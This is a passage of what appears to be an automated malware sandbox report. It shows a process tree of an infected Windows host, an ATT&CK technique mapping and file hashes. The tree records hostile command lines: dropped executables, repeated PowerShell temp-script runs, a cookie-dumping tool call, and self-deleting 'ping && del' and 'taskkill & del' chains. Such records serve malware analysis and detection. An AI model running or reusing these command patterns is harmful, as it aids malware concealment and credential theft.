                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:1268
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            9⤵
                                                                                                              PID:5908
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:5544
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                              8⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5340
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                                9⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:5872
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:2488
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:5952
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:4780
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:4892
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:4844
                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2664
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3044
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                              3⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4852
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping 127.0.0.1
                                                                                                                4⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:5060
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks whether UAC is enabled
                                                                                                            PID:5012
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4640
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              3⤵
                                                                                                                PID:1552
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5320
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4400
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3288
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                            1⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1052
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:4072
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:2360
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                            1⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4420
                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            PID:4600
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4684
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:4724
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            PID:5060
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:5676
                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                            1⤵
                                                                                                            • Enumerates connected drives
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Modifies registry class
                                                                                                            PID:5548
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 65C523103CE97A59047BD9F0EF62ED07 C
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:6116
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 4127373887754FD51FF9095EAC19CC20
                                                                                                              2⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5884
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                3⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5736
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 59C4D7B66EAE7C7B64D86894EF59C692 E Global\MSI0000
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:4832
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:6032
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                              PID:5260
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DA2F.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\DA2F.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4856
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F317.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\F317.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4620
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                                2⤵
                                                                                                                  PID:5944
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout 1
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:3128
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F317.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\F317.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:4476
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im F317.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F317.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5528
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im F317.exe /f
                                                                                                                      4⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:3440
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      4⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:2432
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 1488
                                                                                                                  2⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Program crash
                                                                                                                  PID:4928
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F7EB.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\F7EB.exe
                                                                                                                1⤵
                                                                                                                  PID:5256
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F7EB.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\F7EB.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5644
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F7EB.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\F7EB.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2640
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B6.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B6.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5584
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 736
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4872
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 748
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3888
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 848
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4360
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 896
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Program crash
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:2628
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1188
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3824
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1356
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4988
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1432
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:492
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1472
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5944
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1580
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:6012
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1176
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:6120
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1596
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3716
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1716
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Program crash
                                                                                                                    PID:5008
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1756
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5952
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1788
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5696
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1864
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5868
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1972
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:6036
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 2012
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5212
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1832
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5612
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1768
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:2664
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1724
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5308
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1688
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:2948
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1860
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1816
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1812
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5944
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1732
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4332
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1932
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5872
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1924
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3752
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1892
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5256
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1904
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1824
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1924
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5068
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1988
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5892
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1920
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1420
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1984
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:2432
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:6120
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:5540
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:5172
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2848
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:5348
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:6004
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4404
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:1156
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:5896
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:4336
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:5256
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                  PID:2924
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:3696
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 3696 -s 2072
                                                                                                                                    2⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:64
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:5728
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:4452

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                    Execution

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Persistence

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1060

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Privilege Escalation

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Defense Evasion

                                                                                                                                    Disabling Security Tools

                                                                                                                                    2
                                                                                                                                    T1089

                                                                                                                                    Modify Registry

                                                                                                                                    5
                                                                                                                                    T1112

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1130

                                                                                                                                    Credential Access

                                                                                                                                    Credentials in Files

                                                                                                                                    4
                                                                                                                                    T1081

                                                                                                                                    Discovery

                                                                                                                                    Software Discovery

                                                                                                                                    1
                                                                                                                                    T1518

                                                                                                                                    Query Registry

                                                                                                                                    5
                                                                                                                                    T1012

                                                                                                                                    System Information Discovery

                                                                                                                                    6
                                                                                                                                    T1082

                                                                                                                                    Security Software Discovery

                                                                                                                                    1
                                                                                                                                    T1063

                                                                                                                                    Peripheral Device Discovery

                                                                                                                                    2
                                                                                                                                    T1120

                                                                                                                                    Remote System Discovery

                                                                                                                                    1
                                                                                                                                    T1018

                                                                                                                                    Collection

                                                                                                                                    Data from Local System

                                                                                                                                    4
                                                                                                                                    T1005

                                                                                                                                    Command and Control

                                                                                                                                    Web Service

                                                                                                                                    1
                                                                                                                                    T1102

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files\Microsoft Office 15\CNQCTBPGLS\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

